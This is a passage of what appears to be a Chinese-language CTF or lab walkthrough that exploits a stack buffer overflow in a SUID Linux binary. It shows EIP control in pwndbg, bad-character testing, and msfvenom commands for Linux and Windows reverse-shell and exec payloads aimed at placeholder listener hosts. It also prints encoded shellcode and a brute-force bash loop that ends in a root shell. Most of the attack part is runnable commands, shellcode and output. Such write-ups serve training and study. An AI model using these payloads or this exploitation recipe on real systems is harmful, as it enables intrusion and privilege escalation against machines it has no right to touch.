0xf7fc1000 0xf7fc5000 r--p 4000 0 [vvar]
0xf7fc5000 0xf7fc7000 r-xp 2000 0 [vdso]
0xf7fc7000 0xf7fc8000 r--p 1000 0 /usr/lib/i386-linux-gnu/ld-linux.so.2
0xf7fc8000 0xf7fec000 r-xp 24000 1000 /usr/lib/i386-linux-gnu/ld-linux.so.2
0xf7fec000 0xf7ffb000 r--p f000 25000 /usr/lib/i386-linux-gnu/ld-linux.so.2
0xf7ffb000 0xf7ffd000 r--p 2000 33000 /usr/lib/i386-linux-gnu/ld-linux.so.2
0xf7ffd000 0xf7ffe000 rw-p 1000 35000 /usr/lib/i386-linux-gnu/ld-linux.so.2
0xfffdd000 0xffffe000 rwxp 21000 0 [stack]

控制 EIP

精准定位,这里的 ESP 就是我们的堆栈 shellcode

pwndbg> r $(python2 -c 'print "A"*171 + "B"*4 + "C"*20')
Starting program: /root/demo/file $(python2 -c 'print "A"*171 + "B"*4 + "C"*20')
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
───────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────
EAX 0x0
*EBX 0xf7fa0ff4 (_GLOBAL_OFFSET_TABLE_) ◂— 0x220d8c
*ECX 0xffffd3f0 ◂— 'CCCCCCC'
*EDX 0xffffd0bd ◂— 'CCCCCCC'
*EDI 0xf7ffcb80 (_rtld_global_ro) ◂— 0x0
*ESI 0xffffd164 —▸ 0xffffd324 ◂— '/root/demo/file'
*EBP 0x41414141 ('AAAA')
*ESP 0xffffd0b0 ◂— 'CCCCCCCCCCCCCCCCCCCC'
*EIP 0x42424242 ('BBBB')
─────────────────────────────────────────────────────[ DISASM / i386 / set emulate on ]─────────────────────────────────────────────────────
Invalid address 0x42424242

─────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────
00:0000│ esp 0xffffd0b0 ◂— 'CCCCCCCCCCCCCCCCCCCC'
... ↓ 4 skipped
05:0014│ 0xffffd0c4 —▸ 0x8048400 ((null)+48) ◂— xchg edi, eax
06:0018│ 0xffffd0c8 ◂— 0x2
07:001c│ 0xffffd0cc —▸ 0xffffd164 —▸ 0xffffd324 ◂— '/root/demo/file'
───────────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────────
► f 0 0x42424242
f 1 0x43434343
f 2 0x43434343
f 3 0x43434343
f 4 0x43434343
f 5 0x43434343
f 6 0x8048400 (null)+48
f 7 0x2

坏字符

生成一串与字节数组相同的坏字符,进行坏点检测,shellcode 的字节只有 50~60 ,所以 256 一个寄存器刚刚好

#!/usr/bin/env python
from __future__ import print_function

for x in range(1, 256):
print("\\x" + "{:02x}".format(x), end='')

print()

测坏点,x/256b $esp,查看 esp 的值

r $(python -c 'print "A"*171 + "B"*4 + "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"')

这里090a(换行)都是坏点

删除继续填充

r $(python -c 'print "A"*171 + "B"*4 + "\x01\x02\x03\x04\x05\x06\x07\x08\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"')

20也是错点

删除继续填充,发现无坏点

r $(python -c 'print "A"*171 + "B"*4 + "\x01\x02\x03\x04\x05\x06\x07\x08\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"')


shellcode

生成 shellcode

payload:

  • -a  框架选择

  • -p 载荷类型

  • -b 坏字符

  • -e 要使用的编码器

  • -f 编译的语言

  • -c 指定要包含的附加 win32 shellcode 文件

  • -v 载荷的名称

Linux:
msfvenom -a x86 --platform linux -p linux/x86/shell_reverse_tcp LHOST=x.x.x.x LPORT=443 -b "\x00\x09\x0a\x20" EXITFUNC=thread -f c

linux2:
msfvenom -a x86 -p linux/x86/exec CMD=/bin/sh -b '\x00\x09\x0a\x20' -e x86/shikata_ga_nai -fc

windows:
msfvenom -p windows/shell_reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=4444 EXITFUNC=thread -b "\x00\x0a\x0d" -f py -v

这里的00也是一个字符,没有算进去生成 shellcode 的时候,需要单独的添加

└─# msfvenom -a x86 -p linux/x86/exec CMD=/bin/sh -b '\x00\x09\x0a\x20' -e x86/shikata_ga_nai -fc
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 70 (iteration=0)
x86/shikata_ga_nai chosen with final size 70
Payload size: 70 bytes
Final size of c file: 319 bytes
unsigned char buf[] =
"\xbb\x98\xdb\x35\xff\xda\xc5\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x0b\x83\xc2\x04\x31\x5a\x11\x03\x5a\x11\xe2\x6d\xb1\x3e\xa7"
"\x14\x14\x27\x3f\x0b\xfa\x2e\x58\x3b\xd3\x43\xcf\xbb\x43\x8b"
"\x6d\xd2\xfd\x5a\x92\x76\xea\x55\x55\x76\xea\x4a\x37\x1f\x84"
"\xbb\xc4\xb7\x58\x93\x79\xce\xb8\xd6\xfe";

溢出

查看 jmp 最后需要看看是否有调用 jmp 到 es(因为我们无法控制 eax)查看能够更好的控制漏洞利用的过程,防止不成功,objdump -D file | grep -P 'jmp|call' | grep esp 不需要 jmp 做跳板到 shellcode,接下来绕过就是用大量的 nop 即可

└─# objdump -D file | grep -P 'jmp|call' | grep esp

这里的 EIP 是在上面进行获取的r $(python2 -c 'print "A"*171 + "B"*4 + "C"*20')\x40\xa8\xa0\xbf大端小端,剩下的就是爆破

  • ls -la   ---查看文件大小

  • -size  ---表示文件大小

  • -type  ---文件类型

  • f 普通文件

写了一个 sh 进行爆破,原理很简单就是撞,主要是要找到 ESP,很坏字符的判断

#!/bin/bash
while true; do
$(find /SECRET -type f -size 5150c) $(python -c 'print "A"*171 + "\x40\xa8\xa0\xbf" + "\x90"*20000 + "\xb8\x37\xc9\x64\x34\xda\xd6\xd9\x74\x24\xf4\x5b\x29\xc9\xb1\x0b\x31\x43\x15\x03\x43\x15\x83\xc3\x04\xe2\xc2\xa3\x6f\x6c\xb5\x66\x16\xe4\xe8\xe5\x5f\x13\x9a\xc6\x2c\xb4\x5a\x71\xfc\x26\x33\xef\x8b\x44\x91\x07\x83\x8a\x15\xd8\xbb\xe8\x7c\xb6\xec\x9f\x16\x46\xa4\x0c\x6f\xa7\x87\x33"') 2> /dev/null
sleep 1
done

[email protected]:/tmp$ vim 1.sh
[email protected]:/tmp$ chmod +x 1.sh
[email protected]:/tmp$ ./1.sh
./1.sh: line 5: 2037 Segmentation fault (core dumped) $(find /SECRET -type f -size 5150c) $(python -c 'print "A"*171 + "\x40\xa8\xa0\xbf" + "\x90"*20000 + "\xb8\x37\xc9\x64\x34\xda\xd6\xd9\x74\x24\xf4\x5b\x29\xc9\xb1\x0b\x31\x43\x15\x03\x43\x15\x83\xc3\x04\xe2\xc2\xa3\x6f\x6c\xb5\x66\x16\xe4\xe8\xe5\x5f\x13\x9a\xc6\x2c\xb4\x5a\x71\xfc\x26\x33\xef\x8b\x44\x91\x07\x83\x8a\x15\xd8\xbb\xe8\x7c\xb6\xec\x9f\x16\x46\xa4\x0c\x6f\xa7\x87\x33"') 2> /dev/null
./1.sh: line 5: 2042 Segmentation fault (core dumped) $(find /SECRET -type f -size 5150c) $(python -c 'print "A"*171 + "\x40\xa8\xa0\xbf" + "\x90"*20000 + "\xb8\x37\xc9\x64\x34\xda\xd6\xd9\x74\x24\xf4\x5b\x29\xc9\xb1\x0b\x31\x43\x15\x03\x43\x15\x83\xc3\x04\xe2\xc2\xa3\x6f\x6c\xb5\x66\x16\xe4\xe8\xe5\x5f\x13\x9a\xc6\x2c\xb4\x5a\x71\xfc\x26\x33\xef\x8b\x44\x91\x07\x83\x8a\x15\xd8\xbb\xe8\x7c\xb6\xec\x9f\x16\x46\xa4\x0c\x6f\xa7\x87\x33"') 2> /dev/null
./1.sh: line 5: 2047 Segmentation fault (core dumped) $(find /SECRET -type f -size 5150c) $(python -c 'print "A"*171 + "\x40\xa8\xa0\xbf" + "\x90"*20000 + "\xb8\x37\xc9\x64\x34\xda\xd6\xd9\x74\x24\xf4\x5b\x29\xc9\xb1\x0b\x31\x43\x15\x03\x43\x15\x83\xc3\x04\xe2\xc2\xa3\x6f\x6c\xb5\x66\x16\xe4\xe8\xe5\x5f\x13\x9a\xc6\x2c\xb4\x5a\x71\xfc\x26\x33\xef\x8b\x44\x91\x07\x83\x8a\x15\xd8\xbb\xe8\x7c\xb6\xec\x9f\x16\x46\xa4\x0c\x6f\xa7\x87\x33"') 2> /dev/null

......
......

./1.sh: line 5: 2862 Segmentation fault (core dumped) $(find /SECRET -type f -size 5150c) $(python -c 'print "A"*171 + "\x40\xa8\xa0\xbf" + "\x90"*20000 + "\xb8\x37\xc9\x64\x34\xda\xd6\xd9\x74\x24\xf4\x5b\x29\xc9\xb1\x0b\x31\x43\x15\x03\x43\x15\x83\xc3\x04\xe2\xc2\xa3\x6f\x6c\xb5\x66\x16\xe4\xe8\xe5\x5f\x13\x9a\xc6\x2c\xb4\x5a\x71\xfc\x26\x33\xef\x8b\x44\x91\x07\x83\x8a\x15\xd8\xbb\xe8\x7c\xb6\xec\x9f\x16\x46\xa4\x0c\x6f\xa7\x87\x33"') 2> /dev/null
./1.sh: line 5: 2867 Segmentation fault (core dumped) $(find /SECRET -type f -size 5150c) $(python -c 'print "A"*171 + "\x40\xa8\xa0\xbf" + "\x90"*20000 + "\xb8\x37\xc9\x64\x34\xda\xd6\xd9\x74\x24\xf4\x5b\x29\xc9\xb1\x0b\x31\x43\x15\x03\x43\x15\x83\xc3\x04\xe2\xc2\xa3\x6f\x6c\xb5\x66\x16\xe4\xe8\xe5\x5f\x13\x9a\xc6\x2c\xb4\x5a\x71\xfc\x26\x33\xef\x8b\x44\x91\x07\x83\x8a\x15\xd8\xbb\xe8\x7c\xb6\xec\x9f\x16\x46\xa4\x0c\x6f\xa7\x87\x33"') 2> /dev/null
./1.sh: line 5: 2872 Segmentation fault (core dumped) $(find /SECRET -type f -size 5150c) $(python -c 'print "A"*171 + "\x40\xa8\xa0\xbf" + "\x90"*20000 + "\xb8\x37\xc9\x64\x34\xda\xd6\xd9\x74\x24\xf4\x5b\x29\xc9\xb1\x0b\x31\x43\x15\x03\x43\x15\x83\xc3\x04\xe2\xc2\xa3\x6f\x6c\xb5\x66\x16\xe4\xe8\xe5\x5f\x13\x9a\xc6\x2c\xb4\x5a\x71\xfc\x26\x33\xef\x8b\x44\x91\x07\x83\x8a\x15\xd8\xbb\xe8\x7c\xb6\xec\x9f\x16\x46\xa4\x0c\x6f\xa7\x87\x33"') 2> /dev/null
./1.sh: line 5: 2877 Segmentation fault (core dumped) $(find /SECRET -type f -size 5150c) $(python -c 'print "A"*171 + "\x40\xa8\xa0\xbf" + "\x90"*20000 + "\xb8\x37\xc9\x64\x34\xda\xd6\xd9\x74\x24\xf4\x5b\x29\xc9\xb1\x0b\x31\x43\x15\x03\x43\x15\x83\xc3\x04\xe2\xc2\xa3\x6f\x6c\xb5\x66\x16\xe4\xe8\xe5\x5f\x13\x9a\xc6\x2c\xb4\x5a\x71\xfc\x26\x33\xef\x8b\x44\x91\x07\x83\x8a\x15\xd8\xbb\xe8\x7c\xb6\xec\x9f\x16\x46\xa4\x0c\x6f\xa7\x87\x33"') 2> /dev/null
id
uid=1000(smeagol) gid=1000(smeagol) euid=0(root) groups=0(root),1000(smeagol)

关注公众号

公众号长期更新安全类文章,关注公众号,以便下次轻松查阅

觉得文章对你有帮助 请转发 点赞 收藏


文章来源: http://mp.weixin.qq.com/s?__biz=MzAwMDQwNTE5MA==&mid=2650246748&idx=1&sn=183d1fb726feab804e06e73f49b66cc3&chksm=82ea55f5b59ddce3038dac843b1db03799f8280f77f5bc24a7f5c2dc301b1213f5f93b18b60e#rd
如有侵权请联系:admin#unsafe.sh